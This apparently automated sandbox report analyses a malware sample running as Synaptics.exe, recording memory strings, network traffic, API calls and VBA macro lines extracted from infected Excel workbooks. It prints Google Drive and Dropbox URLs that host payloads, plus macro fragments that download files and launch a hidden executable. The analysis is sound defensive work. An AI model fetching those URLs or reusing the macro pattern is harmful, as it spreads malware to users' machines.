                              Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                              Source: Synaptics.exe, 00000003.00000002.1610030732.000000000061A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                              Source: Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                              Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                              Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                              Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1516798933.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                              Source: Synaptics.exe, 00000003.00000002.1617542093.000000000542E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1515835379.000000000542E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                              Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.000000000061A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                              Source: Synaptics.exe, 00000003.00000002.1628301207.000000000612E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXA
                              Source: Synaptics.exe, 00000003.00000002.1617542093.000000000542E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1515835379.000000000542E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                              Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1514607067.000000000067F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1516798933.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadct
                              Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1516798933.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                              Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                              Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1516798933.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                              Source: Synaptics.exe, 00000003.00000002.1617542093.000000000542E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1515835379.000000000542E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                              Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1516798933.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                              Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.000000000542E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                              Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado1W
                              Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1516798933.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                              Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                              Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                              Source: FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                              Source: FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                              Source: ~$cache1.3.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                              Source: Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                              Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.goopF
                              Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1515835379.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.0000000005439000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.000000000542E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                              Source: Synaptics.exe, 00000003.00000003.1515835379.000000000542E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/%
                              Source: Synaptics.exe, 00000003.00000002.1610030732.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#&j
                              Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                              Source: Synaptics.exe, 00000003.00000002.1610030732.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.br
                              Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                              Source: Synaptics.exe, 00000003.00000002.1610030732.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC~
                              Source: Synaptics.exe, 00000003.00000003.1514607067.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMy
                              Source: Synaptics.exe, 00000003.00000003.1514607067.000000000067F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_ygnnx
                              Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 00000003.00000003.1514607067.000000000067F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                              Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado:
                              Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoK
                              Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                              Source: FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                              Source: ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                              Source: ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                              Source: FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlX
                              Source: ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                              Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49712 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49711 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.8:49718 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.8:49719 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49723 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49724 version: TLS 1.2
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DE7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_00DE7099
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DE7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00DE7294
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_00237294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00237294
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DE7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_00DE7099
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DD4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,2_2_00DD4342
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DFF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00DFF5D0
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0024F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_0024F5D0

                              System Summary

                              barindex
                              Source: JUIlYPbf.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: JUIlYPbf.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: JUIlYPbf.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: JUIlYPbf.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: JUIlYPbf.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: JUIlYPbf.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: JUIlYPbf.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: JUIlYPbf.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: JUIlYPbf.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: JUIlYPbf.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: JUIlYPbf.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: GAOBCVIQIJ.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: GAOBCVIQIJ.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: GAOBCVIQIJ.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: GAOBCVIQIJ.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: GAOBCVIQIJ.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: GAOBCVIQIJ.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: GAOBCVIQIJ.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: GAOBCVIQIJ.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: GAOBCVIQIJ.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: GAOBCVIQIJ.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: GAOBCVIQIJ.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: JUIlYPbf.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: GAOBCVIQIJ.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: JUIlYPbf.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: GAOBCVIQIJ.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: JUIlYPbf.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: GAOBCVIQIJ.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00D929C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,2_2_00D929C2
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00E002AA NtdllDialogWndProc_W,2_2_00E002AA
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DFE769 NtdllDialogWndProc_W,CallWindowProcW,2_2_00DFE769
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DFEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,2_2_00DFEAA6
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DFEA4E NtdllDialogWndProc_W,2_2_00DFEA4E
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DAAC99 NtdllDialogWndProc_W,2_2_00DAAC99
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DFECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,2_2_00DFECBC
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DAAD5C NtdllDialogWndProc_W,74B1C8D0,NtdllDialogWndProc_W,2_2_00DAAD5C
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DAAFB4 GetParent,NtdllDialogWndProc_W,2_2_00DAAFB4
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DFEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,2_2_00DFEFA8
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DFF0A1 SendMessageW,NtdllDialogWndProc_W,2_2_00DFF0A1
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DFF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,2_2_00DFF122
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DFF3DA NtdllDialogWndProc_W,2_2_00DFF3DA
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DFF3AB NtdllDialogWndProc_W,2_2_00DFF3AB
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DFF37C NtdllDialogWndProc_W,2_2_00DFF37C
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DFF45A ClientToScreen,NtdllDialogWndProc_W,2_2_00DFF45A
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DFF425 NtdllDialogWndProc_W,2_2_00DFF425
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DFF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00DFF5D0
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DFF594 GetWindowLongW,NtdllDialogWndProc_W,2_2_00DFF594
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DAB7F2 NtdllDialogWndProc_W,2_2_00DAB7F2
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DAB845 NtdllDialogWndProc_W,2_2_00DAB845
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DFFE80 NtdllDialogWndProc_W,2_2_00DFFE80
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DFFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,2_2_00DFFF91
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DFFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,2_2_00DFFF04
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_001E29C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,10_2_001E29C2
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_002502AA NtdllDialogWndProc_W,10_2_002502AA
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0024E769 NtdllDialogWndProc_W,CallWindowProcW,10_2_0024E769
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0024EA4E NtdllDialogWndProc_W,10_2_0024EA4E
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0024EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,10_2_0024EAA6
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_001FAC99 NtdllDialogWndProc_W,10_2_001FAC99
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0024ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,10_2_0024ECBC
